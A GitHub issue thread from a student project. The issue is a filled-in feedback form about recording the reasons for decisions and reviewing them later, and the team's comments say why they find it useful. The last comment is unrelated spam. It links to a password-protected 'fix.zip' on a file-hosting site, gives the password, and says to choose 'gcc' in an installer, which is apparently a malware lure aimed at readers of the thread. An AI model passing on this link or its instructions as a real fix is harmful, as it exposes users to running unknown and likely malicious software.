### ISSUE TITLE
[Feedback] Enhancing Decision Transparency

### ISSUE THREAD

**Issue by amyWenhui** [24-S2-2-C-EduKATE/24-S2-2-C-EduKATE.github.io#176]
## From
- [X] Shadow
- [ ] Self
- [ ] Tutor
- [ ] Client
- [ ] Tutor

## Topic

- [ ] PROJECT OUTPUT
- [X] DECISION-MAKING
- [ ] TEAM WORK
- [ ] STAKEHOLDER ENGAGEMENT
- [ ] REFLECTION

## Date Received

2024-08-17

## Description

Increased transparency in decision-making. When decisions are made, document the rationale and context for the decision so that all involved can understand why the decision was made.Regularly review and evaluate the effectiveness of key decisions to ensure continuous optimization of the decision-making process.

## Review Context

- [X] Group Meeting
  - 
- [ ] Other (please specify): ______________________

## Reviewed By

- [X] Yi Wang
- [X] Syii Liu
- [X] Dong-Jhang Wu
- [X] Rifang Zhou
- [X] Finn McClusky
- [X] Wendi Shi
- [X] Wenjing Qi

## Is this feedback useful?

- [X] Yes
- [ ] No

### If yes,please briefly explain why:

This feedback is really valuable for our team's growth and project success. It focuses on two important aspects of decision-making that can make a big difference. First, it encourages us to be more open about how and why we make decisions. By writing down our reasons and the situation around each choice, everyone on the team can understand the thinking behind it. This helps avoid confusion and keeps everyone on the same page. Second, it reminds us to look back at our decisions regularly to see how well they've worked out. This is like learning from our experiences – if something didn't go as planned, we can figure out why and do better next time. If a decision turned out great, we can understand why and use that knowledge for future choices. By following this advice, we're likely to make smarter decisions over time, work better as a team, and keep improving how we handle challenges in our project. It's a simple but powerful way to boost our effectiveness and keep getting better at what we do.

### If no, please select the reason(s):
- [ ] Not aligned with current goals or strategy
- [ ] Already implemented or in progress
- [ ] Not feasible due to technical limitations
- [ ] Not feasible due to resource constraints
- [ ] Not applicable to our product/service
- [ ] Based on misunderstanding of our product/service
- [ ] No constructive suggestions
- [ ] Outside of our target market or user base
- [ ] Other (please specify): ______________________

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
